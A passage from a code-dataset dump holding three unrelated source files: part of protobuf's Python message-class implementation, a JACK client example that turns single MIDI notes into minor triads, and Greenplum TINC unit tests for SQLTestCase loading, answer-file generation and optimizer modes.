for field_name, field_value in list(kwargs.items()):
field_cdescriptor = self.__descriptors.get(field_name, None)
if not field_cdescriptor:
raise ValueError('Protocol message has no "%s" field.' % field_name)
if field_cdescriptor.label == _LABEL_REPEATED:
if field_cdescriptor.cpp_type == _CPPTYPE_MESSAGE:
field_name = getattr(self, field_name)
for val in field_value:
field_name.add().MergeFrom(val)
else:
getattr(self, field_name).extend(field_value)
elif field_cdescriptor.cpp_type == _CPPTYPE_MESSAGE:
getattr(self, field_name).MergeFrom(field_value)
else:
setattr(self, field_name, field_value)
Init.__module__ = None
Init.__doc__ = None
cls.__init__ = Init
def _IsMessageSetExtension(field):
"""Checks if a field is a message set extension."""
return (field.is_extension and
field.containing_type.has_options and
field.containing_type.GetOptions().message_set_wire_format and
field.type == _TYPE_MESSAGE and
field.message_type == field.extension_scope and
field.label == _LABEL_OPTIONAL)
def _AddMessageMethods(message_descriptor, cls):
"""Adds the methods to a protocol message class."""
if message_descriptor.is_extendable:
def ClearExtension(self, extension):
self.Extensions.ClearExtension(extension)
def HasExtension(self, extension):
return self.Extensions.HasExtension(extension)
def HasField(self, field_name):
return self._cmsg.HasField(field_name)
def ClearField(self, field_name):
child_cmessage = None
if field_name in self._composite_fields:
child_field = self._composite_fields[field_name]
del self._composite_fields[field_name]
child_cdescriptor = self.__descriptors[field_name]
# TODO(anuraag): Support clearing repeated message fields as well.
if (child_cdescriptor.label != _LABEL_REPEATED and
child_cdescriptor.cpp_type == _CPPTYPE_MESSAGE):
child_field._owner = None
child_cmessage = child_field._cmsg
if child_cmessage is not None:
self._cmsg.ClearField(field_name, child_cmessage)
else:
self._cmsg.ClearField(field_name)
def Clear(self):
cmessages_to_release = []
for field_name, child_field in list(self._composite_fields.items()):
child_cdescriptor = self.__descriptors[field_name]
# TODO(anuraag): Support clearing repeated message fields as well.
if (child_cdescriptor.label != _LABEL_REPEATED and
child_cdescriptor.cpp_type == _CPPTYPE_MESSAGE):
child_field._owner = None
cmessages_to_release.append((child_cdescriptor, child_field._cmsg))
self._composite_fields.clear()
self._cmsg.Clear(cmessages_to_release)
def IsInitialized(self, errors=None):
if self._cmsg.IsInitialized():
return True
if errors is not None:
errors.extend(self.FindInitializationErrors())
return False
def SerializeToString(self):
if not self.IsInitialized():
raise message.EncodeError(
'Message %s is missing required fields: %s' % (
self._cmsg.full_name, ','.join(self.FindInitializationErrors())))
return self._cmsg.SerializeToString()
def SerializePartialToString(self):
return self._cmsg.SerializePartialToString()
def ParseFromString(self, serialized):
self.Clear()
self.MergeFromString(serialized)
def MergeFromString(self, serialized):
byte_size = self._cmsg.MergeFromString(serialized)
if byte_size < 0:
raise message.DecodeError('Unable to merge from string.')
return byte_size
def MergeFrom(self, msg):
if not isinstance(msg, cls):
raise TypeError(
"Parameter to MergeFrom() must be instance of same class: "
"expected %s got %s." % (cls.__name__, type(msg).__name__))
self._cmsg.MergeFrom(msg._cmsg)
def CopyFrom(self, msg):
self._cmsg.CopyFrom(msg._cmsg)
def ByteSize(self):
return self._cmsg.ByteSize()
def SetInParent(self):
return self._cmsg.SetInParent()
def ListFields(self):
all_fields = []
field_list = self._cmsg.ListFields()
fields_by_name = cls.DESCRIPTOR.fields_by_name
for is_extension, field_name in field_list:
if is_extension:
extension = cls._extensions_by_name[field_name]
all_fields.append((extension, self.Extensions[extension]))
else:
field_descriptor = fields_by_name[field_name]
all_fields.append(
(field_descriptor, getattr(self, field_name)))
all_fields.sort(key=lambda item: item[0].number)
return all_fields
def FindInitializationErrors(self):
return self._cmsg.FindInitializationErrors()
def __str__(self):
return str(self._cmsg)
def __eq__(self, other):
if self is other:
return True
if not isinstance(other, self.__class__):
return False
return self.ListFields() == other.ListFields()
def __ne__(self, other):
return not self == other
def __hash__(self):
raise TypeError('unhashable object')
def __unicode__(self):
# Lazy import to prevent circular import when text_format imports this file.
from google.protobuf import text_format
return text_format.MessageToString(self, as_utf8=True).decode('utf-8')
# Attach the local methods to the message class.
for key, value in list(locals().copy().items()):
if key not in ('key', 'value', '__builtins__', '__name__', '__doc__'):
setattr(cls, key, value)
# Static methods:
def RegisterExtension(extension_handle):
extension_handle.containing_type = cls.DESCRIPTOR
cls._extensions_by_name[extension_handle.full_name] = extension_handle
if _IsMessageSetExtension(extension_handle):
# MessageSet extension. Also register under type name.
cls._extensions_by_name[
extension_handle.message_type.full_name] = extension_handle
cls.RegisterExtension = staticmethod(RegisterExtension)
def FromString(string):
msg = cls()
msg.MergeFromString(string)
return msg
cls.FromString = staticmethod(FromString)
def _AddPropertiesForExtensions(message_descriptor, cls):
"""Adds properties for all fields in this protocol message type."""
extension_dict = message_descriptor.extensions_by_name
for extension_name, extension_field in list(extension_dict.items()):
constant_name = extension_name.upper() + '_FIELD_NUMBER'
setattr(cls, constant_name, extension_field.number)
| mit | -264,181,149,115,612,030 | 34.493976 | 80 | 0.697217 | false |
spatialaudio/jackclient-python | examples/midi_chords.py | 1 | 1118 | #!/usr/bin/env python3
"""JACK client that creates minor triads from single MIDI notes.
All MIDI events are passed through.
Two additional events are created for each NoteOn and NoteOff event.
"""
import jack
import struct
# First 4 bits of status byte:
NOTEON = 0x9
NOTEOFF = 0x8
INTERVALS = 3, 7 # minor triad
client = jack.Client('MIDI-Chord-Generator')
inport = client.midi_inports.register('input')
outport = client.midi_outports.register('output')
@client.set_process_callback
def process(frames):
outport.clear_buffer()
for offset, indata in inport.incoming_midi_events():
# Note: This may raise an exception:
outport.write_midi_event(offset, indata) # pass through
if len(indata) == 3:
status, pitch, vel = struct.unpack('3B', indata)
if status >> 4 in (NOTEON, NOTEOFF):
for i in INTERVALS:
# Note: This may raise an exception:
outport.write_midi_event(offset, (status, pitch + i, vel))
with client:
print('#' * 80)
print('press Return to quit')
print('#' * 80)
input()
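# A small sketch of the arithmetic the process() callback applies (values are
# hypothetical): an incoming NoteOn for middle C -- status byte 0x90, pitch 60,
# velocity 100 -- is passed through unchanged, and one extra event is written per
# interval in INTERVALS:
#
#   >>> status, pitch, vel = 0x90, 60, 100
#   >>> [(status, pitch + i, vel) for i in INTERVALS]
#   [(144, 63, 100), (144, 67, 100)]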
| mit | -4,470,220,128,332,092,000 | 26.95 | 78 | 0.644902 | false |
yuanzhao/gpdb | src/test/tinc/tincrepo/mpp/models/regress/sql_related/regress_sql_test_case/regress_sql_test_case.py | 12 | 36052 | """
Copyright (c) 2004-Present Pivotal Software, Inc.
This program and the accompanying materials are made available under
the terms of the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import tinctest
from tinctest.lib import local_path
from tinctest.runner import TINCTestRunner
from mpp.models import SQLTestCase, SQLTestCaseException
import unittest2 as unittest
import shutil
from contextlib import closing
from datetime import datetime
from StringIO import StringIO
from unittest2.runner import _WritelnDecorator
# we're testing SQLTestCase as it pertains to tinc.py (and only tinc.py)
# as such, any attempts by raw unit2 to discover and load MockSQLTestCase must be averted
@unittest.skip('mock')
class MockSQLTestCase(SQLTestCase):
"""
@description test case with metadata
@created 2012-07-05 12:00:00
@modified 2012-07-05 12:00:02
@tags orca hashagg
"""
db_name=os.getenv('USER')
def test_explicit_test_method(self):
pass
@unittest.skip('mock')
class MockSQLTestCaseGenerateAns(SQLTestCase):
"""
@description test case with metadata
@created 2012-07-05 12:00:00
@modified 2012-07-05 12:00:02
@tags orca hashagg
"""
sql_dir = 'sql_no_ans/'
generate_ans = 'yes'
def test_explicit_test_method(self):
pass
@unittest.skip('mock')
class MockSQLTestCaseForceGenerateAns(SQLTestCase):
"""
@description test case with metadata
@created 2012-07-05 12:00:00
@modified 2012-07-05 12:00:02
@tags orca hashagg
"""
sql_dir = 'sql_no_ans/'
generate_ans = 'force'
def test_explicit_test_method(self):
pass
@unittest.skip('mock')
class MockSQLTestCaseIncorrectGenerateAns(SQLTestCase):
"""
@description test case with metadata
@created 2012-07-05 12:00:00
@modified 2012-07-05 12:00:02
@tags orca hashagg
"""
# Misspelled generate_ans. Invalid value.
generate_ans = 'yess'
def test_explicit_test_method(self):
pass
@unittest.skip('mock')
class MockSQLTestCaseGpdiffNoAnsFile(SQLTestCase):
"""
@description test case with metadata
@created 2012-07-05 12:00:00
@modified 2012-07-05 12:00:02
@tags orca hashagg
"""
sql_dir = 'sql_no_ans/'
def test_explicit_test_method(self):
pass
@unittest.skip('mock')
class MockSQLTestCaseNoGpdiffNoAnsFile(SQLTestCase):
"""
@description test case with metadata
@created 2012-07-05 12:00:00
@modified 2012-07-05 12:00:02
@tags orca hashagg
@gpdiff False
"""
sql_dir = 'sql_no_ans/'
def test_explicit_test_method(self):
pass
@unittest.skip('mock')
class MockSQLTestCaseWithOptimizerOn(SQLTestCase):
"""
@description test case with metadata
@created 2012-07-05 12:00:00
@modified 2012-07-05 12:00:02
@tags orca hashagg
@optimizer_mode on
"""
db_name=os.getenv('USER')
@unittest.skip('mock')
class MockSQLTestCaseWithOptimizerOff(SQLTestCase):
"""
@description test case with metadata
@created 2012-07-05 12:00:00
@modified 2012-07-05 12:00:02
@tags orca hashagg
@optimizer_mode off
"""
db_name=os.getenv('USER')
@unittest.skip('mock')
class MockSQLTestCaseWithOptimizerBoth(SQLTestCase):
"""
@description test case with metadata
@created 2012-07-05 12:00:00
@modified 2012-07-05 12:00:02
@tags orca hashagg
@optimizer_mode both
"""
db_name=os.getenv('USER')
class SQLTestCaseTests(unittest.TestCase):
def test_run_sql_test_failure(self):
test_loader = tinctest.TINCTestLoader()
test_suite = test_loader.loadTestsFromTestCase(MockSQLTestCase)
# Find our desired test case in test_suite.
# This code is a consequence of us only having implemented
# loadTestsFromTestCase. An implementation of loadTestsFromNames
# would likely have allowed us to isolate test_query02 directly.
test_case = None
for temp in test_suite._tests:
if temp.name == "MockSQLTestCase.test_query02":
test_case = temp
self.assertIsNotNone(test_case)
# As explained above, we want MockSQLTestCase to run if and only if
# it's being invoked by our unit tests. So, it's skipped if discovered
# directly by unit2. Here, bearing in mind that SQLTestCaseTests is itself
# triggered by unit2, we override MockSQLTestCase's skip decorator to allow
# this explicit construction of MockSQLTestCase to proceed.
test_case.__class__.__unittest_skip__ = False
test_result = unittest.TestResult()
test_case.run(test_result)
self.assertEqual(test_result.testsRun, 1)
self.assertEqual(len(test_result.errors), 0)
self.assertEqual(len(test_result.skipped), 0)
self.assertEqual(len(test_result.failures), 1)
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query02.diff')))
shutil.rmtree(test_case.get_out_dir())
def test_run_sql_test_success(self):
test_loader = tinctest.TINCTestLoader()
test_suite = test_loader.loadTestsFromTestCase(MockSQLTestCase)
# Find our desired test case in test_suite.
# This code is a consequence of us only having implemented
# loadTestsFromTestCase. An implementation of loadTestsFromNames
# would likely have allowed us to isolate the desired test directly.
test_case = None
for temp in test_suite._tests:
if temp.name == "MockSQLTestCase.test_query03":
test_case = temp
self.assertIsNotNone(test_case)
# As explained above, we want MockSQLTestCase to run if and only if
# it's being invoked by our unit tests. So, it's skipped if discovered
# directly by unit2. Here, bearing in mind that SQLTestCaseTests is itself
# triggered by unit2, we override MockSQLTestCase's skip decorator to allow
# this explicit construction of MockSQLTestCase to proceed.
test_case.__class__.__unittest_skip__ = False
test_result = unittest.TestResult()
test_case.run(test_result)
self.assertEqual(test_result.testsRun, 1)
self.assertEqual(len(test_result.errors), 0)
self.assertEqual(len(test_result.skipped), 0)
self.assertEqual(len(test_result.failures), 0)
shutil.rmtree(test_case.get_out_dir())
def test_run_entire_sql_test_case(self):
test_loader = tinctest.TINCTestLoader()
test_suite = test_loader.loadTestsFromTestCase(MockSQLTestCase)
# As explained above, we want MockSQLTestCase to run if and only if
# it's being invoked by our unit tests. So, it's skipped if discovered
# directly by unit2. Here, bearing in mind that SQLTestCaseTests is itself
# triggered by unit2, we override MockSQLTestCase's skip decorator to allow
# this explicit construction of MockSQLTestCase to proceed.
test_case = None
for test_case in test_suite._tests:
test_case.__class__.__unittest_skip__ = False
test_result = unittest.TestResult()
test_suite.run(test_result)
# 3 sql files with ans files and 1 explicit method
self.assertEqual(test_result.testsRun, 4)
self.assertEqual(len(test_result.errors), 0)
self.assertEqual(len(test_result.skipped), 0)
self.assertEqual(len(test_result.failures), 1)
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query02.diff')))
shutil.rmtree(test_case.get_out_dir())
def test_verify_setup_teardown(self):
test_loader = tinctest.TINCTestLoader()
test_suite = test_loader.loadTestsFromTestCase(MockSQLTestCase)
# As explained above, we want MockSQLTestCase to run if and only if
# it's being invoked by our unit tests. So, it's skipped if discovered
# directly by unit2. Here, bearing in mind that SQLTestCaseTests is itself
# triggered by unit2, we override MockSQLTestCase's skip decorator to allow
# this explicit construction of MockSQLTestCase to proceed.
for test_case in test_suite._tests:
test_case.__class__.__unittest_skip__ = False
if os.path.exists(local_path("output/")):
shutil.rmtree(local_path("output/"))
test_result = unittest.TestResult()
test_suite.run(test_result)
self.assertEqual(test_result.testsRun, 4)
self.assertEqual(len(test_result.errors), 0)
self.assertEqual(len(test_result.skipped), 0)
self.assertEqual(len(test_result.failures), 1)
# Verify if setup and teardown sqls were executed
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'setup.out')))
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'setup', 'setup1.out')))
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'teardown.out')))
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'teardown', 'teardown1.out')))
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query03_setup.out')))
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query03_teardown.out')))
def test_run_explicit_test_method(self):
test_loader = tinctest.TINCTestLoader()
test_suite = test_loader.loadTestsFromTestCase(MockSQLTestCase)
# Find our desired test case in test_suite.
# This code is a consequence of us only having implemented
# loadTestsFromTestCase. An implementation of loadTestsFromNames
# would likely have allowed us to isolate the desired test directly.
test_case = None
for temp in test_suite._tests:
if temp.name == "MockSQLTestCase.test_explicit_test_method":
test_case = temp
self.assertIsNotNone(test_case)
# As explained above, we want MockSQLTestCase to run if and only if
# it's being invoked by our unit tests. So, it's skipped if discovered
# directly by unit2. Here, bearing in mind that SQLTestCaseTests is itself
# triggered by unit2, we override MockSQLTestCase's skip decorator to allow
# this explicit construction of MockSQLTestCase to proceed.
test_case.__class__.__unittest_skip__ = False
test_result = unittest.TestResult()
test_case.run(test_result)
self.assertEqual(test_result.testsRun, 1)
self.assertEqual(len(test_result.errors), 0)
self.assertEqual(len(test_result.skipped), 0)
self.assertEqual(len(test_result.failures), 0)
def test_with_local_init_file(self):
test_loader = tinctest.TINCTestLoader()
test_suite = test_loader.loadTestsFromTestCase(MockSQLTestCase)
# Find our desired test case in test_suite.
# This code is a consequence of us only having implemented
# loadTestsFromTestCase. An implementation of loadTestsFromNames
# would likely have allowed us to isolate the desired test directly.
test_case = None
for temp in test_suite._tests:
if temp.name == "MockSQLTestCase.test_query04":
test_case = temp
self.assertIsNotNone(test_case)
# As explained above, we want MockSQLTestCase to run if and only if
# it's being invoked by our unit tests. So, it's skipped if discovered
# directly by unit2. Here, bearing in mind that SQLTestCaseTests is itself
# triggered by unit2, we override MockSQLTestCase's skip decorator to allow
# this explicit construction of MockSQLTestCase to proceed.
test_case.__class__.__unittest_skip__ = False
test_result = unittest.TestResult()
test_case.run(test_result)
self.assertEqual(test_result.testsRun, 1)
self.assertEqual(len(test_result.errors), 0)
self.assertEqual(len(test_result.skipped), 0)
self.assertEqual(len(test_result.failures), 0)
def test_run_no_ans_file(self):
test_loader = tinctest.TINCTestLoader()
test_suite = test_loader.loadTestsFromTestCase(MockSQLTestCase)
# Store all test names in a list
test_case_list = []
for temp in test_suite._tests:
test_case_list.append(temp.name)
# Verify that other sql files with ans files and explicit method is in the list
self.assertTrue('MockSQLTestCase.test_explicit_test_method' in test_case_list)
self.assertTrue('MockSQLTestCase.test_query02' in test_case_list)
# Verify that test_query_no_ans_file is not there, even though the sql file is there without the ans file
self.assertTrue('MockSQLTestCase.test_query_no_ans_file' not in test_case_list)
# Verify the default value of generate_ans is no
self.assertTrue(MockSQLTestCase.generate_ans == 'no')
def test_gpdiff_no_ans_file(self):
"""
Test whether we throw an exception when there is no ans file for a sql file and gpdiff is set to True
"""
test_loader = tinctest.TINCTestLoader()
test_suite = test_loader.loadTestsFromTestCase(MockSQLTestCaseGpdiffNoAnsFile)
# Find our desired test case in test_suite.
# This code is a consequence of us only having implemented
# loadTestsFromTestCase. An implementation of loadTestsFromNames
# would likely have allowed us to isolate the desired test directly.
test_case = None
for temp in test_suite._tests:
if temp.name == "MockSQLTestCaseGpdiffNoAnsFile.test_query_no_ans_file":
test_case = temp
self.assertIsNotNone(test_case)
# As explained above, we want MockSQLTestCase to run if and only if
# it's being invoked by our unit tests. So, it's skipped if discovered
# directly by unit2. Here, bearing in mind that SQLTestCaseTests is itself
# triggered by unit2, we override MockSQLTestCase's skip decorator to allow
# this explicit construction of MockSQLTestCase to proceed.
test_case.__class__.__unittest_skip__ = False
test_result = unittest.TestResult()
test_case.run(test_result)
self.assertEqual(test_result.testsRun, 1)
self.assertEqual(len(test_result.errors), 1)
self.assertEqual(len(test_result.skipped), 0)
self.assertEqual(len(test_result.failures), 0)
def test_no_gpdiff_no_ans_file(self):
"""
Test whether we construct a test for sqls with no ans files when gpdiff is turned off
"""
test_loader = tinctest.TINCTestLoader()
test_suite = test_loader.loadTestsFromTestCase(MockSQLTestCaseNoGpdiffNoAnsFile)
# Store all test names in a list
test_case_list = []
for temp in test_suite._tests:
test_case_list.append(temp.name)
# Verify that other sql files with ans files and explicit method is in the list
self.assertTrue('MockSQLTestCaseNoGpdiffNoAnsFile.test_explicit_test_method' in test_case_list)
self.assertTrue('MockSQLTestCaseNoGpdiffNoAnsFile.test_query02' in test_case_list)
# Verify that test_query_no_ans_file is there, even though the sql file is there without the ans file
self.assertTrue('MockSQLTestCaseNoGpdiffNoAnsFile.test_query_no_ans_file' in test_case_list)
def test_run_generate_ans_file_class_variable(self):
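        """
        Test that sql files without ans files are also loaded as tests when generate_ans is set on the class.
        """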
test_loader = tinctest.TINCTestLoader()
test_suite = test_loader.loadTestsFromTestCase(MockSQLTestCaseGenerateAns)
# Store all test names in a list
test_case_list = []
for temp in test_suite._tests:
test_case_list.append(temp.name)
# Verify that other sql files with ans files and explicit method is in the list
self.assertTrue('MockSQLTestCaseGenerateAns.test_explicit_test_method' in test_case_list)
self.assertTrue('MockSQLTestCaseGenerateAns.test_query02' in test_case_list)
# Verify that test_query_no_ans_file is also there, even though its ans file is not there
self.assertTrue('MockSQLTestCaseGenerateAns.test_query_no_ans_file' in test_case_list)
def test_run_incorrect_generate_ans_file_class_variable(self):
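        """
        Test that an invalid generate_ans class variable surfaces as a TINCTestCaseLoadFailure.
        """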
test_loader = tinctest.TINCTestLoader()
test_suite = test_loader.loadTestsFromTestCase(MockSQLTestCaseIncorrectGenerateAns)
count = 0
for test in test_suite._tests:
if 'TINCTestCaseLoadFailure' in str(test):
count += 1
self.assertEquals(count, 1)
def test_run_sql_generate_ans(self):
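        """
        Test that setup, query and teardown ans files are generated when generate_ans is enabled.
        """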
test_loader = tinctest.TINCTestLoader()
test_suite = test_loader.loadTestsFromTestCase(MockSQLTestCaseGenerateAns)
# Ans file that will be generated
ans_file = local_path("query_no_ans_file.ans")
# If ans file is there for some reason, remove it (not testing force here)
if os.path.exists(ans_file):
os.remove(ans_file)
# Find our desired test case in test_suite.
# This code is a consequence of us only having implemented
# loadTestsFromTestCase. An implementation of loadTestsFromNames
        # would likely have allowed us to isolate test_query02 directly.
test_case = None
for temp in test_suite._tests:
if temp.name == "MockSQLTestCaseGenerateAns.test_query_no_ans_file":
test_case = temp
self.assertIsNotNone(test_case)
# As explained above, we want MockSQLTestCase to run if and only if
# it's being invoked by our unit tests. So, it's skipped if discovered
# directly by unit2. Here, bearing in mind that SQLTestCaseTests is itself
# triggered by unit2, we override MockSQLTestCase's skip decorator to allow
# this explicit construction of MockSQLTestCase to proceed.
test_case.__class__.__unittest_skip__ = False
test_result = unittest.TestResult()
test_case.run(test_result)
self.assertEqual(test_result.testsRun, 1)
self.assertEqual(len(test_result.errors), 0)
self.assertEqual(len(test_result.skipped), 0)
self.assertEqual(len(test_result.failures), 0)
# Verify that ans file is generated
self.assertTrue(os.path.exists(local_path("setup.ans")))
self.assertTrue(os.path.exists(ans_file))
self.assertTrue(os.path.exists(local_path("teardown.ans")))
# Cleanup
os.remove(local_path("setup.ans"))
os.remove(ans_file)
os.remove(local_path("teardown.ans"))
def test_run_sql_force_generate_ans(self):
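        """
        Test that forced ans file generation overwrites an existing (empty) ans file with real content.
        """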
test_loader = tinctest.TINCTestLoader()
test_suite = test_loader.loadTestsFromTestCase(MockSQLTestCaseForceGenerateAns)
# Ans file that will be generated
ans_file = local_path("query_no_ans_file.ans")
# Create the empty ans file to allow force to overwrite
open(ans_file, 'w').close()
self.assertTrue(os.path.getsize(ans_file) == 0)
# Find our desired test case in test_suite.
# This code is a consequence of us only having implemented
# loadTestsFromTestCase. An implementation of loadTestsFromNames
        # would likely have allowed us to isolate test_query02 directly.
test_case = None
for temp in test_suite._tests:
if temp.name == "MockSQLTestCaseForceGenerateAns.test_query_no_ans_file":
test_case = temp
self.assertIsNotNone(test_case)
# As explained above, we want MockSQLTestCase to run if and only if
# it's being invoked by our unit tests. So, it's skipped if discovered
# directly by unit2. Here, bearing in mind that SQLTestCaseTests is itself
# triggered by unit2, we override MockSQLTestCase's skip decorator to allow
# this explicit construction of MockSQLTestCase to proceed.
test_case.__class__.__unittest_skip__ = False
test_result = unittest.TestResult()
test_case.run(test_result)
self.assertEqual(test_result.testsRun, 1)
self.assertEqual(len(test_result.errors), 0)
self.assertEqual(len(test_result.skipped), 0)
self.assertEqual(len(test_result.failures), 0)
# Verify that ans file is there
self.assertTrue(os.path.exists(local_path("setup.ans")))
self.assertTrue(os.path.exists(ans_file))
self.assertTrue(os.path.exists(local_path("teardown.ans")))
# Verify that ans file size is greater than 0
self.assertTrue(os.path.getsize(ans_file) > 0)
# Cleanup
os.remove(local_path("setup.ans"))
os.remove(ans_file)
os.remove(local_path("teardown.ans"))
def test_run_sql_force_generate_ans_permission_denied(self):
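        """
        Test that forced ans file generation reports an error when the ans file is not writable.
        """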
test_loader = tinctest.TINCTestLoader()
test_suite = test_loader.loadTestsFromTestCase(MockSQLTestCaseForceGenerateAns)
# Find our desired test case in test_suite.
# This code is a consequence of us only having implemented
# loadTestsFromTestCase. An implementation of loadTestsFromNames
        # would likely have allowed us to isolate test_query04 directly.
test_case = None
for temp in test_suite._tests:
if temp.name == "MockSQLTestCaseForceGenerateAns.test_query04":
                # query04.ans would not be checked out from Perforce, so writing to it is not allowed
test_case = temp
self.assertIsNotNone(test_case)
# As explained above, we want MockSQLTestCase to run if and only if
# it's being invoked by our unit tests. So, it's skipped if discovered
# directly by unit2. Here, bearing in mind that SQLTestCaseTests is itself
# triggered by unit2, we override MockSQLTestCase's skip decorator to allow
# this explicit construction of MockSQLTestCase to proceed.
test_case.__class__.__unittest_skip__ = False
test_result = unittest.TestResult()
test_case.run(test_result)
self.assertEqual(test_result.testsRun, 1)
self.assertEqual(len(test_result.errors), 1)
self.assertEqual(len(test_result.skipped), 0)
self.assertEqual(len(test_result.failures), 0)
def test_run_sql_file(self):
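        """
        Test run_sql_file in default, optimizer-on and optimizer-off modes and check the generated sql/out files.
        """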
test_case = MockSQLTestCase('test_query03')
if os.path.exists(test_case.get_out_dir()):
shutil.rmtree(test_case.get_out_dir())
# Default mode
test_case.run_sql_file(local_path('query03.sql'))
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query03.sql')))
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query03.out')))
self.assertFalse(self._check_str_in_file('SET optimizer',
os.path.join(test_case.get_out_dir(), 'query03.sql')))
# Optimizer on mode
test_case.run_sql_file(local_path('query03.sql'), optimizer=True)
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query03_orca.sql')))
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query03_orca.out')))
self.assertTrue(self._check_str_in_file('SET optimizer=on;',
os.path.join(test_case.get_out_dir(), 'query03_orca.sql')))
# Optimizer off mode
test_case.run_sql_file(local_path('query03.sql'), optimizer=False)
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query03_planner.sql')))
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query03_planner.out')))
self.assertTrue(self._check_str_in_file('SET optimizer=off;',
os.path.join(test_case.get_out_dir(), 'query03_planner.sql')))
def test_run_sql_test_optimizer_on(self):
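        """
        Test that running with optimizer on produces query03_orca files containing 'SET optimizer=on;'.
        """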
test_loader = tinctest.TINCTestLoader()
test_suite = test_loader.loadTestsFromTestCase(MockSQLTestCaseWithOptimizerOn)
# Find our desired test case in test_suite.
# This code is a consequence of us only having implemented
# loadTestsFromTestCase. An implementation of loadTestsFromNames
        # would likely have allowed us to isolate test_query02 directly.
test_case = None
for temp in test_suite._tests:
if temp.name == "MockSQLTestCaseWithOptimizerOn.test_query03":
test_case = temp
self.assertIsNotNone(test_case)
# As explained above, we want MockSQLTestCase to run if and only if
# it's being invoked by our unit tests. So, it's skipped if discovered
# directly by unit2. Here, bearing in mind that SQLTestCaseTests is itself
# triggered by unit2, we override MockSQLTestCase's skip decorator to allow
# this explicit construction of MockSQLTestCase to proceed.
test_case.__class__.__unittest_skip__ = False
test_result = unittest.TestResult()
test_case.run(test_result)
self.assertEqual(test_result.testsRun, 1)
self.assertEqual(len(test_result.errors), 0)
self.assertEqual(len(test_result.skipped), 0)
self.assertEqual(len(test_result.failures), 0)
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query03_orca.sql')))
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query03_orca.out')))
self.assertTrue(self._check_str_in_file("SET optimizer=on;",
os.path.join(test_case.get_out_dir(), 'query03_orca.sql')))
self.assertTrue(self._check_str_in_file("SET optimizer=on;",
os.path.join(test_case.get_out_dir(), 'query03_orca.out')))
shutil.rmtree(test_case.get_out_dir())
def test_run_sql_test_optimizer_off(self):
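        """
        Test that running with optimizer off produces query03_planner files containing 'SET optimizer=off;'.
        """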
test_loader = tinctest.TINCTestLoader()
test_suite = test_loader.loadTestsFromTestCase(MockSQLTestCaseWithOptimizerOff)
# Find our desired test case in test_suite.
# This code is a consequence of us only having implemented
# loadTestsFromTestCase. An implementation of loadTestsFromNames
        # would likely have allowed us to isolate test_query02 directly.
test_case = None
for temp in test_suite._tests:
if temp.name == "MockSQLTestCaseWithOptimizerOff.test_query03":
test_case = temp
self.assertIsNotNone(test_case)
# As explained above, we want MockSQLTestCase to run if and only if
# it's being invoked by our unit tests. So, it's skipped if discovered
# directly by unit2. Here, bearing in mind that SQLTestCaseTests is itself
# triggered by unit2, we override MockSQLTestCase's skip decorator to allow
# this explicit construction of MockSQLTestCase to proceed.
test_case.__class__.__unittest_skip__ = False
test_result = unittest.TestResult()
test_case.run(test_result)
self.assertEqual(test_result.testsRun, 1)
self.assertEqual(len(test_result.errors), 0)
self.assertEqual(len(test_result.skipped), 0)
self.assertEqual(len(test_result.failures), 0)
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query03_planner.sql')))
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query03_planner.out')))
self.assertTrue(self._check_str_in_file("SET optimizer=off;",
os.path.join(test_case.get_out_dir(), 'query03_planner.sql')))
self.assertTrue(self._check_str_in_file("SET optimizer=off;",
os.path.join(test_case.get_out_dir(), 'query03_planner.out')))
shutil.rmtree(test_case.get_out_dir())
def test_run_sql_test_optimizer_both(self):
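        """
        Test that optimizer_mode 'both' expands test_query03 into planner and orca variants and runs both.
        """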
test_loader = tinctest.TINCTestLoader()
# For data provider test cases, we have to use loadTestsFromName, since loadTestsFromTestCase won't filter and expand
test_suite = test_loader.loadTestsFromName("mpp.models.regress.sql_related.regress_sql_test_case.regress_sql_test_case.MockSQLTestCaseWithOptimizerBoth")
# Find our desired test case in test_suite.
test_case = None
new_test_suite = tinctest.TINCTestSuite()
for temp in test_suite._tests:
if "MockSQLTestCaseWithOptimizerBoth.test_query03" in temp.name:
new_test_suite.addTest(temp)
temp.__class__.__unittest_skip__ = False
test_case = temp
        self.assertIsNotNone(test_case)
self.assertEquals(new_test_suite.countTestCases(), 2)
test_result = unittest.TestResult()
new_test_suite.run(test_result)
self.assertEqual(test_result.testsRun, 2)
self.assertEqual(len(test_result.errors), 0)
self.assertEqual(len(test_result.skipped), 0)
self.assertEqual(len(test_result.failures), 0)
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query03_planner.sql')))
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query03_planner.out')))
self.assertTrue(self._check_str_in_file("SET optimizer=off;",
                                                os.path.join(test_case.get_out_dir(), 'query03_planner.sql')))
self.assertTrue(self._check_str_in_file("SET optimizer=off;",
os.path.join(test_case.get_out_dir(), 'query03_planner.out')))
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query03_orca.sql')))
self.assertTrue(os.path.exists(os.path.join(test_case.get_out_dir(), 'query03_orca.out')))
self.assertTrue(self._check_str_in_file("SET optimizer=on;",
os.path.join(test_case.get_out_dir(), 'query03_orca.sql')))
